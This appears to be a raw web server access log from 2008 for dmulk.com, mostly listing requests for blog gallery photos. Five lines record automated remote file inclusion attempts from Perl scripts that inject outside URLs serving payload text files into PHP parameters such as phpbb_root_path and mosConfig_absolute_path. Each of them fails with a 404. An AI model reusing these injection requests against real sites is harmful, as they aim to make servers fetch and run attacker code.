72.199.235.196 - - [20/Sep/2008:09:35:06 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0155.jpg HTTP/1.1" 200 371716 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:35:08 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-260.jpg HTTP/1.1" 200 432121 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:35:09 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-059_0.jpg HTTP/1.1" 200 306451 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
83.64.132.254 - - [20/Sep/2008:09:35:15 -0700] "GET /logs/access_080221.log//update/update5.php?lang=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
116.125.113.115 - - [20/Sep/2008:09:35:16 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.natusa.spb.ru/skins/breeze/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.213.195.36 - - [20/Sep/2008:09:35:16 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
116.125.113.115 - - [20/Sep/2008:09:35:16 -0700] "GET /logs/access_080430.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.natusa.spb.ru/skins/breeze/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
116.125.113.115 - - [20/Sep/2008:09:35:16 -0700] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.natusa.spb.ru/skins/breeze/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:35:16 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0123.jpg HTTP/1.1" 200 552331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:35:18 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0148.jpg HTTP/1.1" 200 398432 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:35:20 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-016.jpg HTTP/1.1" 200 472300 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
